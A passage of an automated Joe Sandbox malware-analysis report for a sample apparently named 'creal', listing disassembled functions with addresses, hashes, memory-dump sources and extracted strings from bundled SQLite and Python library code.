                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21AEA5E0DB9781FA099F91F8513BC32A5BF08BD1F454535C82D1B660EF3CA659C382
                                                                                                                                                                                                                Function 00007FF8E71528B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
                                                                                                                                                                                                                • Instruction ID: 9cfe270bf9549bbbdd36a186b38a9244427921aeb49a744aba97b98dee843f8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3821ABA5E0DB9785FA488F91F8413BC22A5AB05BD1F480635D86D4A360EF3CA558C352
                                                                                                                                                                                                                Function 00007FF8E71530DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
                                                                                                                                                                                                                • Instruction ID: dbd64fb3edeb16bac011e5a21711cf98fe498edb2819ea409594608b9ba893cf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D21CC75E0CB8781FA088F90F8843BC23A6AF08BD1F484435C92D1B260EF3DA1588382
                                                                                                                                                                                                                Function 00007FF8E7152E6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>$>
                                                                                                                                                                                                                • API String ID: 4228545439-4024159097
                                                                                                                                                                                                                • Opcode ID: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
                                                                                                                                                                                                                • Instruction ID: efe95e375999378b2b5e995c773bd650be34a7f0c35fc2d84e1e940e51af8ddd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C80116A6E09B8381FB1D5BD4E84137D22A2AF40BD1F444035CA2E1B3A0DF3DA4859313
                                                                                                                                                                                                                Function 00007FF8E68EC47A Relevance: 8.0, APIs: 1, Strings: 4, Instructions: 491COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: 2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                • API String ID: 3510742995-3617401034
                                                                                                                                                                                                                • Opcode ID: 1c93ec38d3358962f044fd8c9bc7468739eb095e07bda336951e211f631fe774
                                                                                                                                                                                                                • Instruction ID: e3adb46f5f6bf6d40ab8fb43e50fc0616b2cc1d6bfe06f79c594a16fb1e8e616
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c93ec38d3358962f044fd8c9bc7468739eb095e07bda336951e211f631fe774
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85326772F286668AE7109FA5984437D77A1FB45BC8F104132EA5D97B98DF3CE841CB02
                                                                                                                                                                                                                Function 00007FF8E694C140 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                • API String ID: 3510742995-1299490920
                                                                                                                                                                                                                • Opcode ID: ebcd032ed702c523410fed20a5182b5d1ca5bd3a286d7c744cd26ba470fb2b13
                                                                                                                                                                                                                • Instruction ID: 4289cacdf3454c7da849fbd4445c03db509f6f2ec06c7dd4b0e31c9f410105bc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebcd032ed702c523410fed20a5182b5d1ca5bd3a286d7c744cd26ba470fb2b13
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF1DD72A28B86C5EB509B96948837A77A0FF45BD4F484232DE4E47795DF3CE491C302
                                                                                                                                                                                                                Function 00007FF8E68DB220 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 354COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 3510742995-3418467682
                                                                                                                                                                                                                • Opcode ID: 91602f75254d7218a0107a53bc688bcdb00c3f4e10742aadde5f37c0e5b1a09d
                                                                                                                                                                                                                • Instruction ID: 34dfac3e33041de2c2a1b79ab5fc3f229078682130dccb3c864288e9c6a5c713
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91602f75254d7218a0107a53bc688bcdb00c3f4e10742aadde5f37c0e5b1a09d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF17A72B28B9586DBA09B96E0447AD77A8FB49BC4F048036EE8D43B55DF3DD444C702
                                                                                                                                                                                                                Function 00007FF8E68D6C30 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 311COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                • Opcode ID: b4ecf18cf932ab09c5a0dcd71d723e699248de27d3a2c53308080df3d2a3ce49
                                                                                                                                                                                                                • Instruction ID: 79593c0ff1c7db9e404e317144fc344f3f105ba587d1ec8dcf448702088c34da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4ecf18cf932ab09c5a0dcd71d723e699248de27d3a2c53308080df3d2a3ce49
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD18C72B18B9586DB50CB66E0047A977A8FB88BC4F158036DE4D47B94DF3DD882C311
                                                                                                                                                                                                                Function 00007FF8E69376F0 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 305COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FF8E6937F95,?,?,00000000), ref: 00007FF8E6937770
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FF8E6937F95,?,?,00000000), ref: 00007FF8E69378B7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                                • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                • API String ID: 1297977491-2903559916
                                                                                                                                                                                                                • Opcode ID: 7db31c1c0feca94d0fe2313bbd611dd5f68d38f3a15ed93a798a1538fb93f959
                                                                                                                                                                                                                • Instruction ID: df2a8111dc606e41bb1ec17cd1b093a7c629f2789d9cea7512c1adfd567e0261
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7db31c1c0feca94d0fe2313bbd611dd5f68d38f3a15ed93a798a1538fb93f959
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82C1EF22B6969785EA25EBA190983B97BA0FF41BD4F084235CE5D4B7C5DF3CE801C306
                                                                                                                                                                                                                Function 00007FF8E68DA2A0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 197COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 3510742995-3418467682
                                                                                                                                                                                                                • Opcode ID: 86738842b0e44f20bdd99a39e3ccfa9be7d7f0e77c9da77a4efe8b00987e6719
                                                                                                                                                                                                                • Instruction ID: dfebd96ba85b162d8df8b5f3c832790a70060645314082b2163b4496f4d3b6c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86738842b0e44f20bdd99a39e3ccfa9be7d7f0e77c9da77a4efe8b00987e6719
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C81CF32B1869287D7609BA6D0487AD77AAFB84BD4F108036DB4D47B95DF3CD445C702
                                                                                                                                                                                                                Function 00007FF8E68D7C40 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 0-3418467682
                                                                                                                                                                                                                • Opcode ID: 9ce377c43e4b0ac4e6995e3dcccadade6863006014a481b8dff363d14d379dd9
                                                                                                                                                                                                                • Instruction ID: f2b8f80f679ab64a83f34d1bfc63aa15acf80425df8e7c37b2e5841ebf4160fd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ce377c43e4b0ac4e6995e3dcccadade6863006014a481b8dff363d14d379dd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D81D462B182E19AE720CBA5D5803BD7FA4FB40BC4F044132DB8987A85DF3CE855C762
                                                                                                                                                                                                                Function 00007FF8E694AA10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 158stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00007FF8E694ACA8), ref: 00007FF8E694AB67
                                                                                                                                                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00007FF8E694ACA8), ref: 00007FF8E694AB81
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF8E694ACA8), ref: 00007FF8E694AC18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strncmp$memcpy
                                                                                                                                                                                                                • String ID: CRE$INS
                                                                                                                                                                                                                • API String ID: 2549481713-4116259516
                                                                                                                                                                                                                • Opcode ID: 2cdf261ae80ba7b8320d94f7685348dc68ba0fe4edc577f2275669bc50fda20b
                                                                                                                                                                                                                • Instruction ID: 2cb867822752eb274b3189c88c9b9e164768a6320214bb87c7fabb81b8e2d166
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cdf261ae80ba7b8320d94f7685348dc68ba0fe4edc577f2275669bc50fda20b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D851C321B3D66681FE64BB9695883792392BF80FD0F584135CE5D4B7D9DE3CE8428302
                                                                                                                                                                                                                Function 00007FF8E68D7F40 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpymemmove
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 167125708-3418467682
                                                                                                                                                                                                                • Opcode ID: 79df89aba19dc62236183e3a7e8ad1dbdae6fd8d3e4fea61fcb66bdb4a7a4a6b
                                                                                                                                                                                                                • Instruction ID: 760da26422d4a18c98e531683f0d8198a19ba5afe8f41d06dc4ab672e452ce5b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79df89aba19dc62236183e3a7e8ad1dbdae6fd8d3e4fea61fcb66bdb4a7a4a6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD51DFB2718BD0C5CB10CB49E4446AEBBA5F795BD4F148136EA8E03B54DA3CD455CB21
                                                                                                                                                                                                                Function 00007FF8E7142ED0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocFromLong_Ssize_t$BoolCompareObject_Rich
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4107546884-0
                                                                                                                                                                                                                • Opcode ID: 48720d78ba32745252a3d04257a9edec78878515a75e68daf766dae4164bca8c
                                                                                                                                                                                                                • Instruction ID: 0840a8aeee05cf1ec86fd07577afb0407e1832a58d008427aede2887c1b556f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48720d78ba32745252a3d04257a9edec78878515a75e68daf766dae4164bca8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16212C32A09B53C6E6694BA5D95437C22D1AF49BF0F984630DA3E467D4EF2CE8918703
                                                                                                                                                                                                                Function 00007FF8E7148010 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3617616757-0
                                                                                                                                                                                                                • Opcode ID: 02352599f705a3241e88950aa0469c59beaf4792bcb6d3889a9a60b667567bda
                                                                                                                                                                                                                • Instruction ID: 1fa9da23dea5a2105ced87b14db0442ba4ee5c380dfc0be93fb1d54985f7f79f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02352599f705a3241e88950aa0469c59beaf4792bcb6d3889a9a60b667567bda
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0531A476929B42C5EB694FB8D45C37C32E4AB44BBDF245334CA7A421D1DF7EA4858302
                                                                                                                                                                                                                Function 00007FF8E7146AB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.SuperWeirdWordPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-371468285
